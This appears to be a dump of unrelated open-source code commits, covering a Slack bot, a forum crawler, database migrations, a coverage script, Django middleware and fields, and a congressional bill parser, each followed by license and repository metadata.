# License for the specific language governing permissions and limitations
# under the License.
from nova import flags
from nova import utils
FLAGS = flags.FLAGS
flags.DEFINE_string('ipv6_backend',
'rfc2462',
'Backend to use for IPv6 generation')
def reset_backend():
    """Rebuild the module-level IMPL from the current ``ipv6_backend`` flag.

    Called once at import time (bottom of this module); call it again if
    the flag value changes so the lazily loaded backend is re-selected.
    """
    global IMPL
    IMPL = utils.LazyPluggable(FLAGS['ipv6_backend'],
        rfc2462='nova.ipv6.rfc2462',
        account_identifier='nova.ipv6.account_identifier')
def to_global(prefix, mac, project_id):
    """Delegate to the configured backend's ``to_global``.

    Presumably derives a global IPv6 address from *prefix*, *mac* and
    *project_id*; exact semantics depend on the selected backend module.
    """
    return IMPL.to_global(prefix, mac, project_id)
def to_mac(ipv6_address):
    """Delegate to the configured backend's ``to_mac`` for *ipv6_address*."""
    return IMPL.to_mac(ipv6_address)
reset_backend()
| apache-2.0 | Python |
72678c437f1b1110fb8a14c78dcdd4c3c8b64157 | Add initial version of bot script | devupin/allie | rtm.py | rtm.py | import time
from slackclient import SlackClient
token = 'kekmao'
sc = SlackClient(token)
team_join_event = 'team_join'
def send_welcome_message(user):
    """Open a direct-message channel with *user* and send a greeting.

    Uses the module-level SlackClient ``sc``.  When the ``im.open``
    response lacks a channel id, an error is printed and nothing is sent.
    """
    open_response = sc.api_call('im.open', user=user['id'])
    try:
        channel = open_response['channel']['id']
    except (KeyError, ValueError):
        print('Shite happened')
        return
    sc.rtm_send_message(channel, 'welcome to devup')
def main():
    """Poll the Slack RTM stream forever, welcoming each new human member."""
    if not sc.rtm_connect():
        print ("Connection Failed, invalid token?")
        return
    while True:
        for event in sc.rtm_read():
            is_join = event.get('type') == team_join_event
            if is_join and event['user']['is_bot'] is False:
                send_welcome_message(user=event['user'])
        time.sleep(1)
if __name__ == '__main__':
main()
| mit | Python | |
4c499d366429f68ff29c7a2f93553b06f3697405 | Add missing oslo/__init__.py | varunarya10/oslo.rootwrap | oslo/__init__.py | oslo/__init__.py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
__import__('pkg_resources').declare_namespace(__name__)
| apache-2.0 | Python | |
5ee021af46f7b6420b5edeac38f5f34f675fa625 | create basic crawler | Nymphet/sexinsex-content-crawler,Nymphet/sexinsex-crawler | crawler.py | crawler.py | # -*- coding:utf-8 -*-
from urllib import request, parse, error
from time import sleep
import re, os
start_tid = '2507213' # change initial url at here
SEXINSEX_URLS_PREFIX = 'http://www.sexinsex.net/forum/'
encoding = 'gbk'
path = os.path.abspath('.')
sleeptime = 0
def generate_url(tid, pid):
    """Build the forum URL for thread *tid*, page *pid* (fixed '-1' suffix)."""
    return '%sthread-%s-%s-1.html' % (SEXINSEX_URLS_PREFIX, tid, pid)
def download(url):
    """Fetch *url* and save the decoded page under ./html/.

    The saved filename is the percent-encoded URL itself, so it can be
    mapped back to the original address later.
    """
    r = request.Request(url)
    # Spoof a desktop Safari User-Agent, presumably to avoid bot blocking.
    r.add_header('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A')
    with request.urlopen(r) as f:
        # Decode with the module-level ``encoding`` (gbk), dropping
        # undecodable bytes, and store the result as text.
        with open('%s/html/%s'%(path,parse.quote_plus(url)), 'w') as s:
            s.write(f.read().decode(encoding=encoding,errors='ignore'))
class thread():
    """A downloaded forum thread, identified by its tid."""
    def __init__(self,tid):
        """Remember *tid* and precompute the URL of the thread's first page."""
        self.tid = tid
        self.extracted_pids = []
        self.url = generate_url(self.tid, 1)
    # extract all pages in a thread, used to extract contents not in the first page
    def extract_pids(self):
        """Parse the saved first page and fill ``extracted_pids`` with 1..last.

        Scans the locally saved HTML (written by ``download``) for the
        pagination's "last" link and stops at the first match.
        """
        with open('%s/html/%s'%(path,parse.quote_plus(self.url)), 'r') as f:
            p = re.compile(r'''<div class="pages">.*<a href=".*" class="last">(.*)</a>.*</div>''')
            for line in f.readlines():
                n = p.search(line)
                if n:
                    self.extracted_pids = list(range(1,int(n.group(1))+1))
                    break
class page():
    """A single page of a forum thread, identified by (tid, pid)."""
    def __init__(self,tid,pid):
        """Remember the identifiers and precompute this page's URL."""
        self.tid = tid
        self.pid = pid
        self.extracted_tids = []
        self.url = generate_url(self.tid,self.pid)
    # extract all refered tids in this page
    def extract_tids(self):
        """Collect thread ids linked from the locally saved copy of this page.

        NOTE(review): ``p.search`` finds at most one match per line, so
        additional thread links on the same HTML line are ignored --
        confirm whether the saved pages are one-link-per-line.
        """
        with open('%s/html/%s'%(path,parse.quote_plus(self.url)), 'r') as f:
            p = re.compile(r'''<a href="thread-(\d*)-\d*-\d*.html"''')
            for line in f.readlines():
                n = p.search(line)
                if n:
                    self.extracted_tids.append(n.group(1))
def main():
    """Download the seed thread's first page, then every thread it links to."""
    download(generate_url(start_tid,1))
    start_page = page(start_tid,1)
    start_page.extract_tids()
    print('Extracted tids:')
    print(start_page.extracted_tids)
    for tid in start_page.extracted_tids:
        try:
            # Optional politeness delay between downloads; module-level
            # ``sleeptime`` of 0 disables it.
            if sleeptime:
                print('sleeping...')
                sleep(sleeptime)
            print('downloading:',tid)
            download(generate_url(tid,1))
        except error.HTTPError:
            # Skip threads that fail to download and continue with the rest.
            print('HTTPError')
main()
| apache-2.0 | Python | |
5f3a665e4611ae8faf82fcfb2804a0fd9aa84d2b | Create majority_number_iii.py | lilsweetcaligula/Online-Judges,lilsweetcaligula/Online-Judges,lilsweetcaligula/Online-Judges | lintcode/majority_number_iii/py/majority_number_iii.py | lintcode/majority_number_iii/py/majority_number_iii.py | class Solution:
"""
@param nums: A list of integers
@param k: As described
@return: The majority number
"""
def majorityNumber(self, nums, k):
import collections
ratio = 1.0 / k * len(nums)
counter = collections.Counter(nums)
for num in counter:
count = counter[num]
if count > ratio:
return num
return None
| mit | Python | |
8be862467344b9cf45b567008f10face0ed3ebf3 | Create zhconvert.py for Alpha 1.0.3 | yu-george/Dumpling-Bot | packages/zhconvert.py | packages/zhconvert.py | import requests
_url = 'http://opencc.byvoid.com/convert/'
def toTraditional(text):
    """Convert Simplified Chinese *text* to Traditional Chinese.

    POSTs the text to the module-level ``_url`` (OpenCC web API) with the
    's2t.json' (simplified-to-traditional) configuration and returns the
    response body.  The previous chunked-upload variant was dead,
    commented-out code and has been removed.
    """
    req = requests.post(_url, data={'text': text, 'config': 's2t.json', 'precise': '0'})
    return req.text
def toSimplified(text):
    """Convert Traditional Chinese *text* to Simplified Chinese via the
    OpenCC web API at the module-level ``_url``."""
    return requests.post(_url, data={'text': text, 'config': 't2s.json', 'precise': '0'}).text
| mit | Python | |
22f550dd3499d7d063501a2940a716d42362f6bc | Add missing file. | alphagov/notifications-api,alphagov/notifications-api | migrations/versions/0031_add_manage_team_permission.py | migrations/versions/0031_add_manage_team_permission.py | """empty message
Revision ID: 0031_add_manage_team_permission
Revises: 0030_add_template_permission
Create Date: 2016-02-26 10:33:20.536362
"""
# revision identifiers, used by Alembic.
revision = '0031_add_manage_team_permission'
down_revision = '0030_add_template_permission'
import uuid
from datetime import datetime
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
def upgrade():
    """Grant 'manage_team' and 'view_activity' to every user/service pair.

    Reads all rows from user_to_service and inserts two permission rows
    per pair.  Each inserted row now gets its own UUID for the ``id``
    column: the original code reused a single ``uuid.uuid4()`` for both
    inserts of a pair, producing two rows with the same id.
    """
    conn = op.get_bind()
    user_services = conn.execute("SELECT * FROM user_to_service").fetchall()
    for entry in user_services:
        created_at = datetime.now().isoformat().replace('T', ' ')
        for permission in ('manage_team', 'view_activity'):
            # Fresh UUID per row so ids stay unique.
            conn.execute((
                "INSERT INTO permissions (id, user_id, service_id, permission, created_at)"
                " VALUES ('{}', '{}', '{}', '{}', '{}')").format(
                    uuid.uuid4(), entry[0], entry[1], permission, created_at))
def downgrade():
    """Remove the permission rows added by upgrade()."""
    conn = op.get_bind()
    for permission in ('manage_team', 'view_activity'):
        conn.execute("DELETE FROM permissions where permission='{}'".format(permission))
### end Alembic commands ### | mit | Python | |
e25a56331c386fc5478c812702ecc6de7ebf100a | Add script to run dynamorio coverage tool on log files. | eunchong/build,eunchong/build,eunchong/build,eunchong/build | scripts/slave/chromium/dynamorio_coverage.py | scripts/slave/chromium/dynamorio_coverage.py | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Script for creating coverage.info file with dynamorio bbcov2lcov binary.
"""
import glob
import optparse
import os
import subprocess
import sys
from common import chromium_utils
# Method could be a function
# pylint: disable=R0201
COVERAGE_DIR_POSTFIX = '_coverage'
COVERAGE_INFO = 'coverage.info'
def GetExecutableName(executable):
  """Return |executable| with '.exe' appended on Windows, unchanged elsewhere."""
  suffix = '.exe' if sys.platform == 'win32' else ''
  return executable + suffix
def RunCmd(command, env=None, shell=True):
  """Run |command| in a subprocess and block until it finishes.

  Args:
    command: the command to run
    env: dictionary of environment variables
  Returns:
    the child's exit status (retcode)
  """
  # subprocess.call is exactly Popen(...) followed by wait(), returning
  # the child's returncode.
  return subprocess.call(command, shell=shell, env=env)
def CreateCoverageFileAndUpload(options):
  """Create coverage file with bbcov2lcov binary and upload to www dir.

  Returns 0 on success, 1 when no log files were found or the coverage
  file could not be produced.  Raises NotImplementedError on platforms
  other than Windows/Linux/Mac.
  """
  # Assert log files exist
  log_files = glob.glob(os.path.join(options.dynamorio_log_dir, '*.log'))
  if not log_files:
    print 'No coverage log files found.'
    return 1
  # Sharded browser tests get a per-shard file name so shards do not
  # overwrite each other's coverage output.
  if (options.browser_shard_index and
      options.test_to_upload in options.sharded_tests):
    coverage_info = os.path.join(
        options.build_dir, 'coverage_%s.info' % options.browser_shard_index)
  else:
    coverage_info = os.path.join(options.build_dir, COVERAGE_INFO)
  coverage_info = os.path.normpath(coverage_info)
  # Remove any stale output from a previous run.
  if os.path.isfile(coverage_info):
    os.remove(coverage_info)
  bbcov2lcov_binary = GetExecutableName(
      os.path.join(options.dynamorio_dir, 'tools', 'bin32', 'bbcov2lcov'))
  cmd = [
      bbcov2lcov_binary,
      '--dir', options.dynamorio_log_dir,
      '--output', coverage_info]
  # NOTE(review): RunCmd defaults to shell=True; passing a list together
  # with shell=True drops the arguments on POSIX -- confirm this path only
  # runs on Windows, or pass shell=False explicitly.
  RunCmd(cmd)
  # Delete log files.
  log_files = glob.glob(os.path.join(options.dynamorio_log_dir, '*.log'))
  for log_file in log_files:
    os.remove(log_file)
  # Assert coverage.info file exist
  if not os.path.isfile(coverage_info):
    print 'Failed to create coverage.info file.'
    return 1
  # Upload coverage file.
  cov_dir = options.test_to_upload.replace('_', '') + COVERAGE_DIR_POSTFIX
  dest = os.path.join(options.www_dir,
                      options.platform, options.build_id, cov_dir)
  dest = os.path.normpath(dest)
  if chromium_utils.IsWindows():
    # Local copy on Windows.
    print ('chromium_utils.CopyFileToDir(%s, %s)' %
           (coverage_info, dest))
    chromium_utils.MaybeMakeDirectory(dest)
    chromium_utils.CopyFileToDir(coverage_info, dest)
  elif chromium_utils.IsLinux() or chromium_utils.IsMac():
    # Copy over ssh on POSIX, then remove the local file.
    print 'SshCopyFiles(%s, %s, %s)' % (coverage_info, options.host, dest)
    chromium_utils.SshMakeDirectory(options.host, dest)
    chromium_utils.MakeWorldReadable(coverage_info)
    chromium_utils.SshCopyFiles(coverage_info, options.host, dest)
    os.unlink(coverage_info)
  else:
    raise NotImplementedError(
        'Platform "%s" is not currently supported.' % sys.platform)
  return 0
def main():
  """Parse command-line and factory properties, then build/upload coverage.

  Returns the exit code of CreateCoverageFileAndUpload.
  """
  option_parser = optparse.OptionParser()
  # Required options:
  option_parser.add_option('--build-dir',
                           help='path to main build directory (the parent of '
                                'the Release or Debug directory)')
  option_parser.add_option('--build-id',
                           help='The build number of the tested build.')
  option_parser.add_option('--target',
                           help='Target directory.')
  option_parser.add_option('--platform',
                           help='Coverage subdir.')
  option_parser.add_option('--dynamorio-dir',
                           help='Path to dynamorio binary.')
  option_parser.add_option('--dynamorio-log-dir',
                           help='Path to dynamorio coverage log files.')
  option_parser.add_option('--test-to-upload',
                           help='Test name.')
  chromium_utils.AddPropertiesOptions(option_parser)
  options, _ = option_parser.parse_args()
  # Flatten the factory properties onto the options object, then drop the
  # raw property dicts so only plain attributes remain.
  fp = options.factory_properties
  options.browser_shard_index = fp.get('browser_shard_index')
  options.sharded_tests = fp.get('sharded_tests')
  options.host = fp.get('host')
  options.www_dir = fp.get('www-dir')
  del options.factory_properties
  del options.build_properties
  return CreateCoverageFileAndUpload(options)
| bsd-3-clause | Python | |
f9d399fb9fa923c68581279085566ba479349903 | test for api export endpoint | kobotoolbox/kobocat,spatialdev/onadata,mainakibui/kobocat,sounay/flaminggo-test,smn/onadata,hnjamba/onaclone,ehealthafrica-ci/onadata,ehealthafrica-ci/onadata,mainakibui/kobocat,qlands/onadata,GeoODK/onadata,awemulya/fieldsight-kobocat,GeoODK/onadata,piqoni/onadata,mainakibui/kobocat,jomolinare/kobocat,hnjamba/onaclone,kobotoolbox/kobocat,kobotoolbox/kobocat,sounay/flaminggo-test,smn/onadata,eHealthAfrica/onadata,jomolinare/kobocat,hnjamba/onaclone,ehealthafrica-ci/onadata,awemulya/fieldsight-kobocat,eHealthAfrica/onadata,spatialdev/onadata,GeoODK/onadata,awemulya/fieldsight-kobocat,mainakibui/kobocat,sounay/flaminggo-test,spatialdev/onadata,piqoni/onadata,eHealthAfrica/onadata,ehealthafrica-ci/onadata,qlands/onadata,hnjamba/onaclone,smn/onadata,GeoODK/onadata,sounay/flaminggo-test,awemulya/fieldsight-kobocat,qlands/onadata,jomolinare/kobocat,qlands/onadata,kobotoolbox/kobocat,piqoni/onadata,spatialdev/onadata,jomolinare/kobocat,smn/onadata,piqoni/onadata | onadata/apps/api/tests/viewsets/test_export_viewset.py | onadata/apps/api/tests/viewsets/test_export_viewset.py | import os
from django.test import RequestFactory
from onadata.apps.api.viewsets.export_viewset import ExportViewSet
from onadata.apps.main.tests.test_base import TestBase
class TestDataViewSet(TestBase):
    # NOTE(review): the class name says "Data" but every test exercises
    # ExportViewSet -- consider renaming in a follow-up.
    def setUp(self):
        """Create a logged-in user with a published form and token auth headers."""
        super(self.__class__, self).setUp()
        self._create_user_and_login()
        self._publish_transportation_form()
        self.factory = RequestFactory()
        self.extra = {
            'HTTP_AUTHORIZATION': 'Token %s' % self.user.auth_token}
    def _filename_from_disposition(self, content_disposition):
        """Return the filename portion of a Content-Disposition header."""
        filename_pos = content_disposition.index('filename=')
        # NOTE(review): str.index raises ValueError when not found, so this
        # assertion can never fail; it only documents the expectation.
        self.assertTrue(filename_pos != -1)
        return content_disposition[filename_pos + len('filename='):]
    def test_form_list(self):
        """Listing exports returns 200 and includes the published form's data."""
        view = ExportViewSet.as_view({
            'get': 'list',
        })
        # Expected subset of the serialized form.
        data = {
            'owner': 'http://testserver/api/v1/users/bob',
            'public': False,
            'public_data': False,
            'description': u'',
            'downloadable': True,
            'is_crowd_form': False,
            'allows_sms': False,
            'encrypted': False,
            'sms_id_string': u'transportation_2011_07_25',
            'id_string': u'transportation_2011_07_25',
            'title': u'transportation_2011_07_25',
            'bamboo_dataset': u''
        }
        request = self.factory.get('/', **self.extra)
        response = view(request)
        self.assertEqual(response.status_code, 200)
        self.assertDictContainsSubset(data, response.data[0])
    def test_form_get(self):
        """Retrieving without `owner` is a 400; CSV retrieval is a 200 download."""
        self._make_submissions()
        view = ExportViewSet.as_view({
            'get': 'retrieve'
        })
        formid = self.xform.pk
        # Missing URL kwargs: the view must reject the request.
        request = self.factory.get('/', **self.extra)
        response = view(request)
        self.assertEqual(response.status_code, 400)
        self.assertEqual(response.data,
                         {'detail': 'Expected URL keyword argument `owner`.'})
        # csv
        request = self.factory.get('/', **self.extra)
        response = view(request, owner='bob', pk=formid, format='csv')
        self.assertEqual(response.status_code, 200)
        # The response must be served as a CSV attachment.
        headers = dict(response.items())
        content_disposition = headers['Content-Disposition']
        filename = self._filename_from_disposition(content_disposition)
        basename, ext = os.path.splitext(filename)
        self.assertEqual(headers['Content-Type'], 'application/csv')
        self.assertEqual(ext, '.csv')
| bsd-2-clause | Python | |
5a5900a5c0ab1e0ac41469770e3775faf482c21e | write TagField basic | avelino/django-tags | tags/fields.py | tags/fields.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.db.models.fields import CharField
from django.utils.translation import ugettext_lazy as _
from tags.models import Tag
class TagField(CharField):
    """A CharField holding a comma-separated list of tags.

    On save, each tag in the stored string is materialized as a ``Tag``
    row (created if missing).
    """
    def __init__(self,
                 verbose_name=_(u'Tags'),
                 max_length=4000,
                 blank=True,
                 null=True,
                 help_text=_(u'A comma-separated list of tags.'),
                 **kwargs):
        """Forward the tag-friendly defaults to CharField via **kwargs."""
        kwargs['max_length'] = max_length
        kwargs['blank'] = blank
        kwargs['null'] = null
        kwargs['verbose_name'] = verbose_name
        kwargs['help_text'] = help_text
        # NOTE(review): these manual attribute assignments look redundant --
        # CharField.__init__ below presumably sets the same attributes from
        # kwargs; confirm before removing.
        self.max_length = max_length
        self.blank = blank
        self.null = null
        self.verbose_name = verbose_name
        self.help_text = help_text
        CharField.__init__(self, **kwargs)
    def pre_save(self, model_instance, add):
        """Ensure a Tag row exists for each tag, then store the joined names.

        NOTE(review): ``set`` deduplicates but makes the stored order
        nondeterministic, and surrounding whitespace is not stripped --
        confirm whether callers rely on either.
        """
        str_tags = getattr(model_instance, self.name)
        if str_tags:
            tags = set(str_tags.split(','))
            for tag in tags:
                Tag.objects.get_or_create(name=tag)
            return ','.join(tags)
        # Empty/None tag strings fall back to the default CharField behavior.
        return super(TagField, self).pre_save(model_instance, add)
| mit | Python | |
11d2f5e649ef5c5aedec9723894cd29c1d4d81f4 | Add missing migration | fin/froide,fin/froide,fin/froide,fin/froide | froide/document/migrations/0027_alter_document_content_hash.py | froide/document/migrations/0027_alter_document_content_hash.py | # Generated by Django 3.2.4 on 2021-07-07 20:08
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: relaxes Document.content_hash to a blank,
    # nullable, non-editable 40-character field (40 hex chars suggests a
    # SHA-1 digest -- unverified here).
    dependencies = [
        ('document', '0026_auto_20210603_1617'),
    ]
    operations = [
        migrations.AlterField(
            model_name='document',
            name='content_hash',
            field=models.CharField(blank=True, editable=False, max_length=40, null=True),
        ),
    ]
| mit | Python | |
36e3cb292b24d5940efed635c49bf5bb62007edb | Create __init__.py | sinotradition/meridian | acupoints/__init__.py | acupoints/__init__.py | apache-2.0 | Python | ||
41631175c7aae124f7504f068d9c2f8cf1c9e617 | Add exception to describe errors in configuration processing | Ghostkeeper/Luna | plugins/configuration/configurationtype/configuration_error.py | plugins/configuration/configurationtype/configuration_error.py | #!/usr/bin/env python
#-*- coding: utf-8 -*-
#This software is distributed under the Creative Commons license (CC0) version 1.0. A copy of this license should have been distributed with this software.
#The license can also be read online: <https://creativecommons.org/publicdomain/zero/1.0/>. If this online license differs from the license provided with this software, the license provided with this software should be applied.
"""
Defines a class of exceptions used to denote a false state of being for
configuration.
"""
class ConfigurationError(Exception):
	"""
	Raised when something is wrong in the configuration.

	Mostly a marker class, but it also records the configuration type in
	which the problem occurred and prefixes it to the error message.
	"""
	def __init__(self, message, configuration_type):
		"""
		Creates a new ConfigurationError.

		:param message: A description of what went wrong.
		:param configuration_type: The configuration type in which the
		problem occurred.
		"""
		prefixed = "{}: {}".format(configuration_type, message)
		super(ConfigurationError, self).__init__(prefixed)
		self.configuration_type = configuration_type #Kept for debugging purposes.
39fe6bb60e24ac8ac6d9eea60f7dc5b42de25682 | Create PyCompare.py | dadelantado/PyCompare | PyCompare.py | PyCompare.py | import os
from bs4 import BeautifulSoup
def getfiles(path1, path2):
#Load files on root of path1 on files1
for root, dir, names in os.walk(path1):
files1 = names
break #Will break the for to read just the root folder
#Load files on root of path2 on files2
for root, dir, names in os.walk(path2):
files2 = names
break #Will break the for to read just the root folder
#Compares the two list of files and select files with the same name on both paths
interfiles = set(files1).intersection(files2)
#Select just HTML files on mylist
mylist = [ fi for fi in interfiles if fi.endswith('.html')]
print '\nI will check:', len(mylist), 'files in total... HOLD ON!\n'
return mylist
def checkcontent(path1, path2):
    """Compare the shared HTML files of two folders and print a report.

    For every file name present in both roots, compares the H3 header of
    the path1 copy against the H1 header of the path2 copy, and the
    '.bodytext .description' contents of both.  Prints the files with
    different content, the files missing a title, and summary counts.
    """
    #Get files from both paths
    mylist = getfiles(path1, path2)
    difcontent = 0
    diftitles = 0
    titles = []
    notitles = []
    print '='*50
    print 'Files With Different Content'
    print '='*50
    for files in mylist:
        #Parse the path1 copy of the file.
        htmlDoc = open (path1+files, 'r+')
        soup1 = BeautifulSoup(htmlDoc.read())
        #Select div class description inside div class bodytext
        find1 = soup1.select('.bodytext .description')
        #Select H3 tags
        header1 = soup1.h3
        #Parse the path2 copy of the file.
        htmlDoc = open (path2+files, 'r+')
        soup2 = BeautifulSoup(htmlDoc.read())
        #Select div class description inside div class bodytext
        find2 = soup2.select('.bodytext .description')
        #Select H1 tag
        header2 = soup2.h1
        #Record the file when either copy lacks its header tag.
        if (header2 == None or header1 == None):
            notitles.append(files)
        #Otherwise compare the headers' contents.
        else:
            #These loops keep only the LAST child of each header.
            for headers in header1:
                h1 = headers
            for headers2 in header2:
                h3 = headers2
            if not h1 == h3:
                titles.append(files)
                diftitles += 1
        #Keep the last matched description node of each copy.
        #NOTE(review): if find1/find2 is empty, l/n keeps the value from the
        #previous file (or is unbound on the first one) -- confirm intended.
        for lines1 in find1:
            l = lines1
        for lines2 in find2:
            n = lines2
        #Compares content
        if not l == n:
            print files
            difcontent += 1
    #Print results
    print '\n'
    print '='*50
    print 'Files With No Title'
    print '='*50
    for lines in notitles:
        print lines
    print '\n'
    print '='*50
    print 'Files With Different Titles'
    print '='*50
    for lines in titles:
        print lines
    print "\nI've found", difcontent, 'files with different content'
    print "I've found", diftitles, 'different titles'
def main():
    """Entry point: compare the two configured folders.

    The paths below are placeholders; replace them with real directories
    before running.
    """
    mypath = "PATH_TO_FOLDER1"
    mypath2 = "PATH_TO_FOLDER2"
    checkcontent(mypath, mypath2)
if __name__ == "__main__":
main()
| mit | Python | |
a857273666cb616e1c019bedff81d3014070c896 | increase Proofread of Henochbuch | the-it/WS_THEbotIT,the-it/WS_THEbotIT | scripts/online_scripts/150916_increase_proofread_Henochbuch.py | scripts/online_scripts/150916_increase_proofread_Henochbuch.py | # -*- coding: utf-8 -*-
__author__ = 'eso'
import sys
sys.path.append('../../')
from tools.catscan import CatScan
import re
import requests
import pywikibot
from pywikibot import proofreadpage
site = pywikibot.Site()
# Pages 455-473 (inclusive) of the Riessler scan on the configured wiki.
for i in range(455, 474):
    page = pywikibot.proofreadpage.ProofreadPage(site, 'Seite:Riessler Altjuedisches Schrifttum ausserhalb der Bibel {}.jpg'.format(i))
    print(page.status)
    # NOTE(review): writes a private ProofreadPage attribute to set the
    # proofreading user before raising the status -- confirm against the
    # pywikibot version in use.
    page._full_header.user = 'THEbotIT'
    page.proofread()
    page.save()
| mit | Python | |
1d75b7e0bd0c498b5ea2c32c4e98a278ca2aed1b | make sitelockdown generic | avlach/univbris-ocf,avlach/univbris-ocf,avlach/univbris-ocf,avlach/univbris-ocf | src/python/expedient/common/middleware/sitelockdown.py | src/python/expedient/common/middleware/sitelockdown.py | '''
@author jnaous
'''
from django.conf import settings
from django.http import HttpResponseRedirect
from utils import RegexMatcher
class SiteLockDown(RegexMatcher):
    """
    This middleware class will force almost every request coming from
    Django to be authenticated, or it will redirect the user to a login
    page. Some urls can be excluded by specifying their regexes in the
    C{SITE_LOCKDOWN_EXCEPTIONS} tuple in the settings.
    Hints from: http://davyd.livejournal.com/262859.html
    """
    def __init__(self):
        # RegexMatcher loads the exception regexes from this settings name.
        super(SiteLockDown, self).__init__("SITE_LOCKDOWN_EXCEPTIONS")
    def process_request (self, request):
        """Redirect unauthenticated requests to the login page.

        Returns None (continue processing) for authenticated users, the
        login URL itself, or paths matching a lockdown exception.
        """
        # Default django_root to '' when another middleware has not set it.
        try:
            request.django_root
        except AttributeError:
            request.django_root = ''
        login_url = settings.LOGIN_URL + '?next=%s' % request.path
        # Strip the django_root prefix; paths outside it are redirected.
        if request.path.startswith(request.django_root):
            path = request.path[len(request.django_root):]
        else:
            return HttpResponseRedirect (login_url)
        if not request.user.is_authenticated () and not \
            (path == settings.LOGIN_URL or
             self.matches(path)
            ):
            return HttpResponseRedirect (login_url)
        return None
| bsd-3-clause | Python | |
4f8fff9fb2da7bbdab68a0a4c02b51d00410e8c4 | Add synthtool scripts (#3765) | googleapis/google-cloud-java,googleapis/google-cloud-java,googleapis/google-cloud-java | java-automl/google-cloud-automl/synth.py | java-automl/google-cloud-automl/synth.py | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This script is used to synthesize generated parts of this library."""
import synthtool as s
import synthtool.gcp as gcp
# Generators for the GAPIC client surface and the shared repo templates.
gapic = gcp.GAPICGenerator()
# NOTE(review): common_templates is created but never used below.
common_templates = gcp.CommonTemplates()
# Generate the Java AutoML v1beta1 client from the artman config.
library = gapic.java_library(
    service='automl',
    version='v1beta1',
    config_path='artman_automl_v1beta1.yaml',
    artman_output_name='')
# Copy the generated GAPIC sources into this module, and the gRPC/proto
# stubs into the sibling google-api-grpc modules.
s.copy(library / 'gapic-google-cloud-automl-v1beta1/src', 'src')
s.copy(library / 'grpc-google-cloud-automl-v1beta1/src', '../../google-api-grpc/grpc-google-cloud-automl-v1beta1/src')
s.copy(library / 'proto-google-cloud-automl-v1beta1/src', '../../google-api-grpc/proto-google-cloud-automl-v1beta1/src')
| apache-2.0 | Python | |
dacd4e66a367987a84ae13da4e1ad74a4113b25c | Create Congress.py | JohnDvorak/senate-webcrawler | Congress.py | Congress.py | #
# Author : John Dvorak
# Contact : jcd3247@rit.edu
# File : Congress.py
# Usage : Senate parser & webcrawler
#
""" Contains Bill and Politician objects. A Bill represents a proposed bill
from the U.S. Senate or House of Representatives, and a set of
Politicians are created who cosponsor a given set of Bills.
"""
class Bill(object):
    """A single bill introduced during a given congressional term."""

    def __init__(self, bill_dict):
        """Populate the Bill from a Sunlight API dictionary.

        All of the keys read here are guaranteed to be present.
        """
        self.bill_id = bill_dict['bill_id']
        self.number = bill_dict['number']
        self.name = bill_dict['official_title']
        self.sponsor = bill_dict['sponsor_id']
        self.cosponsors = bill_dict['cosponsor_ids']
        self.congress = bill_dict['congress']  # For example, '112'
        self.branch = bill_dict['chamber'].capitalize()

    def __repr__(self):
        """Short form: just the bill number."""
        return "Bill #{}".format(self.number)

    def __str__(self):
        """Five-line summary of the bill's main information."""
        return ("Bill #{}:"
                "\n{}"
                "\nIntroduced in the {}th {}"
                "\nsponsored by {}"
                "\nwith {} cosponsors").format(
                    self.number, self.name, self.congress, self.branch,
                    self.sponsor, len(self.cosponsors))
class Politician(object):
    """A U.S. Senator or a U.S. Representative."""

    # Branch constants used by the parser so exactly one of the two
    # chambers is referenced consistently.
    HOUSE = 'House'
    SENATE = 'Senate'

    def __init__(self, bio_dict):
        """Populate the Politician from a Sunlight API dictionary.

        All of the keys read here are guaranteed to be present.
        """
        self.branch = bio_dict['chamber']           # 'senate' or 'house'
        self.first_name = bio_dict['first_name']    # 'Arthur'
        self.last_name = bio_dict['last_name']      # 'Smith'
        self.title = bio_dict['title']              # 'Sen' or 'Rep'
        self.state = bio_dict['state']              # 'IA'
        self.party = bio_dict['party']              # 'R', 'D', or 'I'
        self.bioguide_id = bio_dict['bioguide_id']  # 'B001242'
        self.bills = []                             # e.g. ['hr1762-112', ...]

    def __repr__(self):
        """One line, e.g. "Rep Arthur Smith(R-IA)"."""
        return "{} {} {}{}".format(self.title, self.first_name,
                                   self.last_name, self.suffix())

    def suffix(self):
        """Party/state suffix, e.g. '(R-IA)'."""
        return "({}-{})".format(self.party, self.state)

    def __str__(self):
        """The __repr__ line plus the number of bills this Politician was
        involved in."""
        return "{} was involved in {} bills.".format(repr(self),
                                                     len(self.bills))
| mit | Python | |
3dd454f899f556d99ae2bc6947a21d04428f8496 | Add the extraction for DCE signal normalized to accelerate the loading | I2Cvb/mp-mri-prostate,I2Cvb/mp-mri-prostate,I2Cvb/mp-mri-prostate | pipeline/feature-extraction/dce/pipeline_extraction_dce.py | pipeline/feature-extraction/dce/pipeline_extraction_dce.py | """
This pipeline is used to resave the data from lemaitre-2016-nov for faster
loading.
"""
import os
import numpy as np
from sklearn.externals import joblib
from sklearn.preprocessing import label_binarize
from protoclass.data_management import DCEModality
from protoclass.data_management import GTModality
from protoclass.preprocessing import StandardTimeNormalization
from protoclass.extraction import EnhancementSignalExtraction
from protoclass.classification import Classify
# NOTE(review): joblib, label_binarize, and Classify are imported but never
# used in this script -- presumably kept for parity with sibling pipelines.
# NOTE: this is a Python 2 script (bare print statements below).
# Define the path where all the patients are
path_patients = '/data/prostate/experiments'
